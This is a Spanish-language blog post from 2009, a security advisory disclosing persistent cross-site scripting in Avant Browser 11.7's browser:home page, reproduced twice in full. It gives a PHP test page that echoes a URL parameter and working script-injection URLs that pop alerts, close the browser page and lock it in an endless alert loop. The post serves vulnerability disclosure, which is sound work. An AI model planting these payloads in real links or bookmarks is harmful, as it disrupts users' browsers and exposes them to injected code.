Avant Browser browser:home Vulnerabilidades XSS Persistentes
03 agosto 2009
###########################################
Avant Browser browser:home Vulnerabilidades XSS Persistentes
url del desarrollador: http://www.avantbrowser.com/
Informador: http://lostmon.blogspot.com/2009/07/
avant-browser-browserhome-persistent.html
Notificado al desarrollador: NO Exploit disponible: YES
############################################
#############
Descripción
#############
La interfaz del navegador Avant eleva a un nuevo nivel de claridad y eficiencia a tu experiencia y las frequentes actualizaciones aumentan su fiabilidad.
El navegador Avant es Gratuito, 100% Grauito!
Avant Browser contiene un fallo de seguridad que permite técnicas de 'Remote Cross Site Scripting'. Este fallo existe gracias a que la aplicación no valida correctamente los enlaces a la hora de registrarlos en el historial, añadir una web a marcadores, y los sitios más visitados en en la página browser:home.
Esto permitiría a un usuario crear un enlace modificado ó un marcador que ejecute código arbitrario en el navegador del usuario mediante la relación validada entre cliente y servidor cuando éste intenta cargar browser:home, desembocando en una pérdida de integridad.
###############
Versiones Comprobadas
###############
Avant Browser 11.7 build 35
#########
Solución
##########
No hay solución disponible en éste momento.
Revisa el registro de cambios de ésta versión:
http://blog.avantforce.com/avant-browser-117-build-35-released/
#############
Línea de Tiempo
#############
Descubierto: 23-jul-2009
Publicado: 30 jul 2009
##################
Probando
##################
Vídeo demostración => http://www.spymac.com/details/?2417793
Al abrir el Navegador Avant y por defecto carga 'browser:home', podemos ver que hay tres columnas, 1 Top Sitios, 2 Historial y 3 Marcadores recientes.
Las tres columnas son vulnerables a XSS, para demostrar los tres casos, hacemos una web de pruebas para testearlo.
<?
$cmd=$_GET[id]
?>
Pongo la web pública para testear =>
http://usuarios.lycos.es/reyfuss/id.php?id=
Abrimos el navegador Avant y navegamos a
http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script>
esperamos a que finalice la carga y cerramos el navegador ó abrimos browser:home.
El script es ejecutado y tenemos dos columnas afectadas, la primera y la segunda.
Vamos a Herramientas -> Borrar Historial
Vamos de nuevo a
http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script>
click derecho y Añadir a marcadores.
Cargamos de nuevo browser:home y tenemos el XSS ejecutado en la columna marcadores.
Por ejemplo si queremos denegar el acceso a browser:home podemos cargar lo siguiente =>
http://usuarios.lycos.es/reyfuss/id.php?id="><script>window.close()</script>
Y cuando cargamos el navegador y carga browser:home, el script lo cierra.
Si quisieramos denegar el servicio cargamos =>
http://usuarios.lycos.es/reyfuss/id.php?id="><script>while(1)alert(1)</script>
################ Final #####################
Agradecimientos:
thnx to estrella to be my ligth
thnx to Brink he is investigate with me.
thnx to all who day after day support me !!!
thnx to RootDev
atentamente:
--
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
Avant Browser browser:home Vulnerabilidades XSS Persistentes
url del desarrollador: http://www.avantbrowser.com/
Informador: http://lostmon.blogspot.com/2009/07/
avant-browser-browserhome-persistent.html
Notificado al desarrollador: NO Exploit disponible: YES
############################################
#############
Descripción
#############
La interfaz del navegador Avant eleva a un nuevo nivel de claridad y eficiencia a tu experiencia y las frequentes actualizaciones aumentan su fiabilidad.
El navegador Avant es Gratuito, 100% Grauito!
Avant Browser contiene un fallo de seguridad que permite técnicas de 'Remote Cross Site Scripting'. Este fallo existe gracias a que la aplicación no valida correctamente los enlaces a la hora de registrarlos en el historial, añadir una web a marcadores, y los sitios más visitados en en la página browser:home.
Esto permitiría a un usuario crear un enlace modificado ó un marcador que ejecute código arbitrario en el navegador del usuario mediante la relación validada entre cliente y servidor cuando éste intenta cargar browser:home, desembocando en una pérdida de integridad.
###############
Versiones Comprobadas
###############
Avant Browser 11.7 build 35
#########
Solución
##########
No hay solución disponible en éste momento.
Revisa el registro de cambios de ésta versión:
http://blog.avantforce.com/avant-browser-117-build-35-released/
#############
Línea de Tiempo
#############
Descubierto: 23-jul-2009
Publicado: 30 jul 2009
##################
Probando
##################
Vídeo demostración => http://www.spymac.com/details/?2417793
Al abrir el Navegador Avant y por defecto carga 'browser:home', podemos ver que hay tres columnas, 1 Top Sitios, 2 Historial y 3 Marcadores recientes.
Las tres columnas son vulnerables a XSS, para demostrar los tres casos, hacemos una web de pruebas para testearlo.
<?
$cmd=$_GET[id]
?>
Pongo la web pública para testear =>
http://usuarios.lycos.es/reyfuss/id.php?id=
Abrimos el navegador Avant y navegamos a
http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script>
esperamos a que finalice la carga y cerramos el navegador ó abrimos browser:home.
El script es ejecutado y tenemos dos columnas afectadas, la primera y la segunda.
Vamos a Herramientas -> Borrar Historial
Vamos de nuevo a
http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script>
click derecho y Añadir a marcadores.
Cargamos de nuevo browser:home y tenemos el XSS ejecutado en la columna marcadores.
Por ejemplo si queremos denegar el acceso a browser:home podemos cargar lo siguiente =>
http://usuarios.lycos.es/reyfuss/id.php?id="><script>window.close()</script>
Y cuando cargamos el navegador y carga browser:home, el script lo cierra.
Si quisieramos denegar el servicio cargamos =>
http://usuarios.lycos.es/reyfuss/id.php?id="><script>while(1)alert(1)</script>
################ Final #####################
Agradecimientos:
thnx to estrella to be my ligth
thnx to Brink he is investigate with me.
thnx to all who day after day support me !!!
thnx to RootDev
atentamente:
--
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
Etiquetas:
avant,
browser,
copias de seguridad,
cross,
fallos,
scripting,
site,
vulnerabilidades,
xss
Publicar un comentario